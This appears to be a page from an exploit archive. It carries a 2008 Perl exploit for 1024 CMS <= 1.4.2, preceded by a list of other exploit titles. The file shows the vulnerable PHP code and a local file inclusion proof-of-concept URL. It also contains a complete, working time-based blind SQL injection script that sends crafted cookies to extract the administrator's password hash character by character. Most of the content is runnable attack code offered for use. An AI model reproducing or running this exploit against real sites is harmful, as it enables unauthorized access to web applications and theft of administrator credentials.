477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
145 lines
3.7 KiB
Perl
Executable file
145 lines
3.7 KiB
Perl
Executable file
# Author: __GiReX__
|
|
# mySite: girex.altervista.org
|
|
# Date: 13/04/2008
|
|
|
|
# CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta)
|
|
# Site: 1024cms.com
|
|
|
|
# Bug1: Local File Inclusion
|
|
# Need: magic_quotes_gpc = Off / register_globals = On
|
|
|
|
# Bug2: Cookie Blind SQL Injection
|
|
# Exploit: Admin Hash Retrieve Exploit
|
|
# Need: magic_quotes_gpc = Off
|
|
|
|
|
|
# Bug1: Vuln Code: pages/print/default/ops/news.php
|
|
|
|
<?php
|
|
if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
|
|
include("./lang/".$lang."/news/default.php");
|
|
|
|
# $lang is unset so we can exploit through local file inclusion
|
|
|
|
|
|
# Include a local file in CMS directory
|
|
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00
|
|
|
|
|
|
|
|
# Bug2: Vuln Code: /includes/system.php: Lines 66-71
|
|
|
|
if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) &&
|
|
isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){
|
|
$_SESSION['logged'] = $_COOKIE['cooklogged'];
|
|
$_SESSION['user'] = $_COOKIE['cookuid'];
|
|
$_SESSION['type'] = $_COOKIE['cooktype'];
|
|
|
|
$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users
|
|
WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'")
|
|
or die("Cannot check combination: ".mysql_error());
|
|
|
|
# We can exploit this vulnerable query editing our cookies and making a blind sql injection
|
|
|
|
|
|
### Start Exploit ###
|
|
|
|
#!/usr/bin/perl -w
|
|
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
|
|
# Admin Hash Retrieve Exploit
|
|
|
|
use LWP::UserAgent;
|
|
use HTTP::Request;
|
|
|
|
if(not defined $ARGV[0])
|
|
{
|
|
print "usage: perl $0 [host] [path]\n";
|
|
print "example: perl $0 localhost /1024/\n";
|
|
exit;
|
|
}
|
|
|
|
my $client = new LWP::UserAgent;
|
|
my @cset = (48..57, 97..102);
|
|
my $hash = undef;
|
|
|
|
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
|
|
$host .= $ARGV[1] unless not defined $ARGV[1];
|
|
|
|
banner();
|
|
check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n";
|
|
syswrite(STDOUT, "[+] Admin Hash: ");
|
|
|
|
for($j = 1; $j <= 32; $j++)
|
|
{
|
|
for($i = 0; $i <= $#cset; $i++)
|
|
{
|
|
$pre_time = time();
|
|
|
|
$rv = check_char($cset[$i], $j);
|
|
$post_time = time();
|
|
|
|
if($post_time - $pre_time > 3 and $rv)
|
|
{
|
|
$hash .= chr($cset[$i]);
|
|
syswrite(STDOUT, chr($cset[$i]), 1);
|
|
last;
|
|
}
|
|
}
|
|
}
|
|
|
|
if(not defined $hash or length($hash) != 32)
|
|
{
|
|
print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n";
|
|
}
|
|
else
|
|
{
|
|
print STDOUT "\n[+] Exploit terminated\n\n";
|
|
}
|
|
|
|
|
|
sub banner
|
|
{
|
|
print "\n";
|
|
print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n";
|
|
print "[+] Admin Hash Retrieve Exploit\n";
|
|
print "[+] Coded by __GiReX__\n";
|
|
print "\n";
|
|
}
|
|
|
|
sub check_vuln
|
|
{
|
|
my $target = shift;
|
|
|
|
$get = new HTTP::Request(GET, $target);
|
|
$get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");
|
|
|
|
$res = $client->request($get);
|
|
|
|
if($res->is_success)
|
|
{
|
|
return 1 if $res->as_string =~ /Cannot check combination/;
|
|
}
|
|
else
|
|
{
|
|
die "[-] Invalid target : ${target}\n\n";
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
sub check_char
|
|
{
|
|
my ($char, $n) = @_;
|
|
|
|
$get->header(Cookie => 'cookpass=-1\'+AND+'.
|
|
'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
|
|
'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
|
|
'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
|
|
'cookuid=1; cooktype=1; cooklogged=1; cookuser=1');
|
|
|
|
$res = $client->request($get);
|
|
|
|
return $res->is_success;
|
|
}
|
|
|
|
# milw0rm.com [2008-04-13]
|